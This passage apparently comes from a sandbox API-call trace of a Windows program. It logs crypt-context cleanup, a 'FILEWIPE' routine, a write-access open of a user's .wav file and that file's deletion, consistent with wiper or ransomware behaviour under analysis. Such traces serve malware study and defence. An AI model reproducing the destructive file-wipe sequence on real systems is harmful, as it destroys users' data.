wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.899] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.899] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.899] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.899] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0038.899] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.899] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.899] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.899] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.899] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.899] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.899] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.900] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.900] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.900] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.900] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.900] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.900] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.900] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.900] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.900] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.900] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.900] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0038.900] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.900] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.900] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.900] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0038.901] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.901] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.902] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.902] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0038.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.902] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.902] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f81270, ftCreationTime.dwHighDateTime=0x1d5bdc1, ftLastAccessTime.dwLowDateTime=0x509ea0e0, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0x509ea0e0, ftLastWriteTime.dwHighDateTime=0x1d5bc01, nFileSizeHigh=0x0, nFileSizeLow=0xfa32, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZaH-2jgJS1xf027TWp.wav", cAlternateFileName="ZAH-2J~1.WAV")) returned 0x7c2240 [0038.902] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.902] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.903] CharLowerBuffW (in: lpsz="byte[64050]", cchLength=0xb | out: lpsz="byte[64050]") returned 0xb [0038.903] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.903] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.903] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.903] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.903] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.903] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.904] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.904] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.905] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\zah-2jgjs1xf027twp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0038.905] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.905] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.906] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.906] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.906] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.906] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.906] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.906] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.906] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.906] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.906] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.906] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.907] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.907] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.907] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.907] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.907] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.907] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", lpFilePart=0x0) returned 0x4d [0038.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f81270, ftCreationTime.dwHighDateTime=0x1d5bdc1, ftLastAccessTime.dwLowDateTime=0x509ea0e0, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0x16e5a9c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xfa32, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ZaH-2jgJS1xf027TWp.wav", cAlternateFileName="ZAH-2J~1.WAV")) returned 0x7c2240 [0038.907] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\zah-2jgjs1xf027twp.wav")) returned 1 [0038.908] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f81270, ftCreationTime.dwHighDateTime=0x1d5bdc1, ftLastAccessTime.dwLowDateTime=0x509ea0e0, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0x16e5a9c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xfa32, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ZaH-2jgJS1xf027TWp.wav", cAlternateFileName="ZAH-2J~1.WAV")) returned 0 [0038.908] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.908] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.908] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.909] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.909] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.909] 